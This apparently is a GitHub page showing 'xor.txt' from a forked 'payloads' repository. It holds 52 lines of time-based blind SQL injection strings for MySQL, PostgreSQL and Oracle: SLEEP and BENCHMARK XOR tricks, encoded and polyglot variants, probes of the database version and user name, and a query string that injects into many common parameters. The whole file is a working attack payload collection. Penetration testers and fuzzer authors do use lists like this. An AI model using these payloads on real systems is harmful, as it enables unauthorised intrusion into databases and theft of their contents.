forked from gayatriracha/payloads
-
Notifications
You must be signed in to change notification settings - Fork 0
/
xor.txt
52 lines (52 loc) · 4.68 KB
/
xor.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'X
0"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z
‘ AND (SELECT 8839 FROM (SELECT(SLEEP(5)))uzIY) AND ‘mSUA’=’mSUA
'XOR(if((select now()=sysdate()),sleep(10),0))XOR'Z
X'XOR(if(now()=sysdate(),/**/sleep(5)/**/,0))XOR'X
X'XOR(if(now()=sysdate(),(sleep((((5))))),0))XOR'X
X'XOR(if((select now()=sysdate()),BENCHMARK(1000000,md5('xyz')),0))XOR'X
'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z
(SELECT(0)FROM(SELECT(SLEEP(6)))a)
'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
'XOR(if(now()=sysdate(),sleep(5*5*0),0))OR'
1 AND (SELECT(0)FROM(SELECT(SLEEP(9)))a)-- wXyW
(SELECT * FROM (SELECT(SLEEP(5)))a)
'%2b(select*from(select(sleep(5)))a)%2b'
CASE//WHEN(LENGTH(version())=10)THEN(SLEEP(6*1))END
');(SELECT 4564 FROM PG_SLEEP(5))--
["')//OR//MID(0x352e362e33332d6c6f67,1,1)//LIKE//5//%23"]
DBMS_PIPE.RECEIVE_MESSAGE(%5BINT%5D,5)%20AND%20%27bar%27=%27bar
AND 5851=DBMS_PIPE.RECEIVE_MESSAGE([INT],5) AND 'bar'='bar
1' AND (SELECT 6268 FROM (SELECT(SLEEP(5)))ghXo) AND 'IKlK'='IKlK
(select*from(select(sleep(20)))a)
'%2b(select*from(select(sleep(0)))a)%2b'
*'XOR(if(2=2,sleep(10),0))OR'
-1' or 1=IF(LENGTH(ASCII((SELECT USER())))>13, 1, 0)--//
'+(select*from(select(if(1=1,sleep(20),false)))a)+'"
2021 AND (SELECT 6868 FROM (SELECT(SLEEP(32)))IiOE)
BENCHMARK(10000000,MD5(CHAR(116)))
'%2bbenchmark(10000000%2csha1(1))%2b'
0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z
if(now()=sysdate(),sleep(5),0)
"XOR(if((select/**/666/**/where/**/1=1),444,0))XOR" // This would result in a TRUE condition returning a response of ~21,000 bytes
"XOR(if((select/**/666/**/where/**/1=2),444,0))XOR" // This would result in a FALSE condition returning ~27,000 bytes
'XOR(if(now()=sysdate(),sleep(5),0))XOR'
'XOR(if(now()=sysdate(),sleep(5*1),0))OR'
0'|(IF((now())LIKE(sysdate()),SLEEP(1),0))|'Z
0'or(now()=sysdate()&&SLEEP(1))or'Zif(now()=sysdate(),sleep(5),0)/"XOR(if(now()=sysdate(),sleep(5),0))OR"/if(now()=sysdate(),sleep(5),0)/*'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0))OR"*/if(now()=sysdate(),sleep(5),0)/'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0) and 5=5)"/if(1=1,sleep(5),0)/*'XOR(if(1=1,sleep(5),0))OR'"XOR(if(1=1,sleep(5),0))OR"*/if(1337=1337,exp(~(1)),0)/*'XOR(if(1337=1337,exp(~(1)),0))OR'"XOR(if(1337=1337,sleep(5),0))OR"*/SLEEP(5)/*' or SLEEP(5) or '" or SLEEP(5) or "*/%2c(select%5*%5from%5(select(sleep(5)))a)
(SELECT(0)FROM(SELECT(SLEEP(8)))a)
'%2b(select*from(select(sleep(5)))a)%2b'
(select*from(select(sleep(5)))a)
'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(9) ELSE 0 END)XOR'Z
1'%2b(select*from(select(sleep(5)))a)%2b'
,(select * from (select(sleep(5)))a)
desc%2c(select*from(select(sleep(5)))a)
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))
-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(5))A))(SELECT * FROM (SELECT(SLEEP(5)))YYYY)(SELECT * FROM (SELECT(SLEEP(5)))YYYY)#(SELECT * FROM (SELECT(SLEEP(5)))YYYY)--'+(select*from(select(sleep(5)))a)+'(select(0)from(select(sleep(5)))v)%2f'+(select(0)from(select(sleep(5)))v)+'"(select(0)from(select(sleep(5)))v)%2f*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*%2f(select(0)from(select(sleep(5)))v)/*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*/(select(0)from(select(sleep(5)))v)/*'+(select(0)from(select(sleep(5)))v)+'\"+(select(0)from(select(sleep(5)))v)+\"*/',''),/*test*/%26%26%09sLeEp(5)%09--+
if(now()=sysdate(),sleep(9),0)/'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"/
if(now()=sysdate(),sleep(0),0)/'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/
'%20and%20(select%20%20from%20(select(if(substring(user(),1,1)='p',sleep(5),1)))a)--%20 - true
if(now()=sysdate(),sleep(3),0)/'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"/
if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0) and 1=1)"/
0%27XOR(if(now()=sysdate(),sleep(9),0))XOR%27Z&category=0%27XOR(if(now()=sysdate(),sleep(9),0))XOR%27Z&city=0%27XOR(if(now()=sysdate(),sleep(9),0))XOR%27Z&country=0%27XOR(if(now()=sysdate(),sleep(9),0))XOR%27Z&email=0%27XOR(if(now()=sysdate(),sleep(9),0))XOR%27Z&id=0%27XOR(if(now()=sysdate(),sleep(9),0))XOR%27Z&language=0%27XOR(if(now()=sysdate(),sleep(9),0))XOR%27Z&page=0%27XOR(if(now()=sysdate(),sleep(9),0))XOR%27Z&password=0%27XOR(if(now()=sysdate(),sleep(9),0))XOR%27Z&product_id=0%27XOR(if(now()=sysdate(),sleep(9),0))XOR%27Z&search=0%27XOR(if(now()=sysdate(),sleep(9),0))XOR%27Z&state=0%27XOR(if(now()=sysdate(),sleep(9),0))XOR%27Z&user=0%27XOR(if(now()=sysdate(),sleep(9),0))XOR%27Z&username=0%27XOR(if(now()=sysdate(),sleep(9),0))XOR%27Z&zip=0%27XOR(if(now()=sysdate(),sleep(9),0))XOR%27Z